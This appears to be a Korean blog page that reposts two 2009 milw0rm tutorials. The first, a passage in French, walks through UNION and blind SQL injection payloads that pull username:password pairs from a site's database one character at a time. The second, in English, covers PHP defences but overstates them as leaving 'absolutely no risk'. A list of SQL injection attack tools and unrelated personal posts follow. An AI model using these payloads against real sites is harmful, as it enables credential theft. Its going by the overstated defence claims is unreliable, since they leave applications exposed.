Il ne reste donc plus qu'a les mettre ensemble avec 0x3a , qui est une valeur de hex pour la colonne.

http://www.site-exemple.com/news.php?id=9 union all select 1,concat(username,0x3a,password),3 from admin/*

Vous allez voir quelques choses du genre:
username:password , admin:admin , admin:unhash..

=============> 
=============> 

__________
Chapitre II)
__________

1) Description : Blind SQL INJECTION.
Le blind se définit comme le sql normal sauf qu'il est un peu plus dure....

=============> 

2) Comment reconnaitre qu'un site est vulnérable au BLIND SQL ?

Prenons un exemple de:
http://www.site-exemple.com/news.php?id=9

Quand on ouvre la page , nous voyons des articles, images ou autres...
Vous pouvez donc tester le blind :

http://www.site-exemple.com/news.php?id=9 and 1=1 <--- ceci est toujours vrai !
Si la page se charge normalement , c'est bon.

http://www.site-exemple.com/news.php?id=9 and 1=2 <--- ceci est faux
Donc si quelques textes ou images ou un truc est oublié ou déformer, alors ce site est exploitable par le blind SQL.

=============> 

3) Trouver la version du MySQL.

Pour avoir la version dans le blind, nous utiliserons le " substring ".

http://www.site-exemple.com/news.php?id=9 and substring(@@version,1,1)=4
Si la page s'affiche normalement, alors c'est une version 4.

http://www.site-exemple.com/news.php?id=9 and substring(@@version,1,1)=5
Si la page s'affiche normalement, alors c'est une version 5.

=============> 

4) Tester si la sélection marche.

Quand le select ne marche pas, nous utiliserons donc le subselect.

Exemple:
http://www.site-exemple.com/news.php?id=9 and (select 1)=1

si la page se charge normalement, alors le subselect marche.
et si nous voulons voir si nous avons l'access au mysql.user , on fait:

Exemple:
http://www.site-exemple.com/news.php?id=9 and (select 1 from mysql.user limit 0,1)=1
Si la page se charge normalement, alors nous avons access au mysql.user et nous pourons avoir quelques mot de passe
en utilisant la fonction load_file() et OUTFILE. =============> 5) Trouver les noms des colomns et tables et l'exploitation. Exemple: http://www.site-exemple.com/news.php?id=9 and (select 1 from users limit 0,1)=1 Si la page se charge normalement sans erreur alors la table users existe. Si vous obtenez une erreur , alors vous devez changer le users et mettre autre chose, a vous de devinez :D c'est un bon jeu hein... disons que nous avons trouver la table.. maintenant nous avons besoin du nom de la colonne.. tout comme cela du nom de table, nous commencons la devinette !! http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Si la page se charge normalement, alors le nom de la colonne est password. Ainsi , nous avons la table et la colonne , exploitons :) http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 Nous continuons a changer le " 80 " jusqu'a trouver une erreur, suivez bien l'exemple: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 Nous avons eu une fois de plus un chargement normal.. on continue http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 Pareille, continuons http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 ERREURRR !!! donc le premier caractère dans username est char(99) si vous convertisser cela en ascii nous avons la lettre " c " . Maintenant cherchons le second caractère: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Noter que je change ,1,1 a ,2,1 pour avoir le second caractère http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 La page se charge normalement http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 ERREUR nombre inférieur.. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 Chargement normal , élevé. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 ERREUR donc nous savons des a présent que le deuxieme caractère est char(105) et que c'est 'i' , cela fera "ci" jusqu'a présent... Faite cela en mode croissant jusqu'a ce que vous obtenez la fin. (si< 0 retourne faux, nous avons atteint la fin alors). ----------------------------- >>>>>>>>>>>>>>>>>>>>>>>>>>>> ----------------------------- Nous voici a la fin de ce tuto... Si vous cherchez bien sur le net , vous pourez avoir plein de programme qui feront tout ceci , mais apprenez a le faire manuellement, c'est important :) . Je remercie ma team ( EVILWAY ) Je remercie MizoZ, ZuKa, str0ke et tout ceux que j'ai oublié... J'espere que ce tuto vous a aider en quelques choses... Contact MSN: m0udi@9.cn Second name: SixSo Nice site that i love: http://www.opensc.ws/ # milw0rm.com [2009-07-02]


[[[[[]]]]]]]]]]] Avoiding SQL Injection By Moudi - EvilWay Team [[[[[]]]]]]]]]]]

SQL injections are among the flaws the most widespread and dangerous in PHP. 
This tutorial will explain clearly the concept of SQL Injection and how to avoid them once and for all.

--------------------------------------------------------------------

>>>>>> 
Summary of tutorial:
  I) Presentation of the problem.
     => The variables containing strings
  II)Security .
     => Explanation
     => Numeric variables
        .Method 1
        .Method 2
>>>>>> 

--------------------------------------------------------------------


I) Presentation of the problem.
   ___________________________

There are two types of SQL injection:

* Injection into the variables that contain strings;
* Injection into numeric variables.

These are two very different types and to avoid them, it will act
differently for each of these types.

######################
The variables containing strings:
######################

Imagine a PHP script that fetches the age of a member according to its
nickname. This nickname has gone from one page to another via the URL
(by $ _GET what: p). This script should look like this:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
...
$pseudo = $_GET['pseudo'];
$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");
...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Well keep you well, this script is a big SQL injection vulnerability.
Suffice it to a bad boy putting in place the username in the URL a query
like this:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


It is to arrive to show (just an example), for example the password for
the member with the id 1. I will not explain in detail the operation for
fear that someone is not nice to walk around. Well, so let us go to the
security:).

II) Security .
_______________

To secure this type of injection is simple. You use the function
mysql_real_escape_string ().

######################
Uh ... It does what it?
######################

This feature adds the "\" character to the following characters:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
NULL, \ x00, \ n, \ r, \, ', "and \ X1A
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

######################
And what's the point?
######################

As you have noticed in previous injection, the attacker uses the quote
(to close the 'around $ nick): if she is prevented from doing that, the
bad boy will only have to look elsewhere . This means that if one
applies a mysql_real_escape_string () to the variable name like this ...

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
...
$pseudo = mysql_real_escape_string($_GET['pseudo']);
$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");
...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The application is completely secure.
Explanation

######################
Injection hacker to recall:
######################

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Well if we apply mysql_real_escape_string () to the variable $ name used
in the query is what will the injection:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
\' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This means that we do not even come out of assessments around $ nick in
the request because the \ has been added. There is another function
somewhat similar to mysql_real_escape_string () is addslashes (), why
not have used? Well recently, a security hole was discovered on this if
it is used on a PHP 4.3.9 installation with magic_quotes_gpc enabled.

######################
Numeric variables:
######################

This type of injection is less known than the previous one, making it
more frequent, and it starts as just now with an example. This time, it
displays the age of a member according to its id, and by passing it by a
form ($ _POST) to change:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
...
$id = $_POST['id'];
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


mysql_real_escape_string () would be nothing here, since if an attacker
wants to inject SQL code, it will not need to use quotes, because the
variable $ id is not surrounded by quotes. Simple example of
exploitation:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2 UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This injection did exactly the same as the previous one, except that
here, to avoid it, there are two solutions:

     * Change the contents of the variable so it contains only numbers;
     * Check if the variable actually contains a number before using it in a query. 

##########
Method 1:
##########

We'll use a function , intval () This function returns regardless of the
contents of a variable its numerical value. For example:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$variable = '1e10';  // $variable vaut '1e10'
$valeur_numerique = intval($variable); // $valeur_numerique vaut 1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now back to our sheep:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$id = intval($_POST['id']);
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

That is: you can stop there and is more than enough, but I recommend you
continue to find another method, or you have air beast if you find this
method on a code that is not yours without understand it.

############
Méthode 2:
###########

Here we use a function that returns TRUE when a variable contains only
numbers and FALSE if it is not the case this function is is_numeric (),
we will use it in a condition that checks whether is_numeric ( ) returns
TRUE well.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$id = $_POST['id'];
if (is_numeric($id))
{
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
}
else
{
echo "Trying to hack me ? MOTHA FUCKAH xD";
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

##################################################################
What is the best, depending intval () and is_numeric ()?
##################################################################

Well I will say that they are both equally effective, they are equal.
But I prefer inval () since with is_numeric () write more code, and if
the variable does not contain only numbers, the request is canceled (in
principle, but of course you can run the same query by choosing an
default value for the variable used). Well that's it! You know all about
securing your applications. If you apply these methods, there is
absolutely no risk of having a fault type SQL injection on its website
(or PHP).

[»] Thanks to:  [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell.. ]
[»] Contact MSN:[ m0udi@9.cn ]
[»] Site :      [ https://security-shell.ws/forum.php ]

# milw0rm.com [2009-07-27]


Tools 

1. SQLIer -
취약점이 있는 URL을 검사하고 사용자의 개입없이 SQL Injection 취약점을 익스플로잇하기 위해 필요한 정보를 점검합니다. 다운로드

2. SQLbftools -
블라인드 SQL Injection 공격을 사용하여 MySQL의 정보를 가져오는 시도를 하는 도구의 모음입니다. 다운로드

3. SQL Injection Brute-forcer - SQL Injection
공격 취약점을 찾고 이를 이용하여 공격하는 자동화 도구입니다. 사용자가 작업하는 내용을 볼 수 있으며, 블라인드 SQL 인젝션을 이용합니다. 다운로드

5. SQL Brute -
블라인드 SQL 인젝션 취약점을 사용하여 데이터베이스에서 데이터를 추출해내는 무작위 도구입니다. MS SQL 서버의 시간, 오류 기반으로 익스플로잇을 수행합니다. 오라클의 경우 오류를 기반으로 합니다. 이 프로그램은 Python으로 작성되었으며 멀티 스레드로 동작하며 표준 라이브러리를 사용합니다. 다운로드

5. BobCat - SQL Injection
취약점의 잇점을 이용하는 감사 도구입니다. 사용자가 사용하는 애플리케이션이 액세스하는 테이블에서 데이터를 가져올 수 있습니다. 다운로드

6. SQLMap -
블라인드 SQL Injection을 자동으로 수행하는 도구로 phthon으로 개발되었다. 다운로드

7. Absinthe - GUI
기반의 도구로 블라인드 SQL Injection 취약점에 이용하여 데이터베이스의 스키마와 목록을 자동화 과정으로 다운로드합니다. 다운로드

8. SQL Injection Pen-testing Tool -
웹 애플리케이션에서의 취약점을 찾아 데이터베이스를 점검하도록 설계된 GUI 기반의 도구. 다운로드

9. SQID - SQL Injection Digger.
웹 사이트의 통상적인 오류와 SQL Injection을 찾는 명령행 기반의 도구. 웹 페이지에서 SQL Injection 이 가능한 부분을 찾아내어 취약점을 입력하는 폼을 테스트한다. 다운로드

10. Blind SQL Injection Perl Tool - bsqlbf
SQL Injection에 취햑한 웹 사이트에서 정보를 가져오도록 작성된 펄 스크립트. 다운로드

11. SQL Power Injection Injector -
이 프로그램은 웹페이지에서 SQL 명령어를 삽입하는 테스트를 수행합니다. 멀티 스레드 방식으로 블라인드 SQL Injection 공격을 자동화하여 실행합니다. 다운로드 

12. FJ-Injector Framework -
웹 애플리케이션에 SQL Injection 취약점이 있는지 검사하기 위해 디자인된 오픈 소스 무료 프로그램입니다. HTTP 요청을 가로쳐서 변경하기 위한 프록시 기능도 제공합니다. SQL Injection 익스플로잇을 자동화하여 수행합니다. 다운로드

13. SQLNinja - MS SQL
서버를 백 엔드 데이터베이스로 사용하는 웹 애플리케이션의 SQL Injection 취약점을 익스플로잇하는 도구입니다. 다운로드

14. Automatic SQL Injector - SQLNinja
와 유사한 도구로, 오류 코드가 반환되는 SQL Injection 취약점을 자동으로 찾아 줍니다. 다운로드

15. NGSS SQL Injector -
데이터베이스에 저장된 데이터를 액세스하기 위한 SQL Injection취약점을 이용하여 익스플로잇합니다. Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase 등 다양한 데이터베이스를 지원합니다. 다운로드


Posted by yangdaegam
l


Posted by yangdaegam
l
요새 하는 게임은 오직 하나.

스타크래프트 2.

그러나, 나의 벗ㅇ, 테란의 벗, 마린의 바늘? 메딕을 멀티플레이에선 볼 수 없다 -_ㅠ

응헝허허ㅓ어ㅓ헝허ㅓ
Posted by yangdaegam
l

Vista

stuffs 2010. 8. 7. 12:16


Posted by yangdaegam
l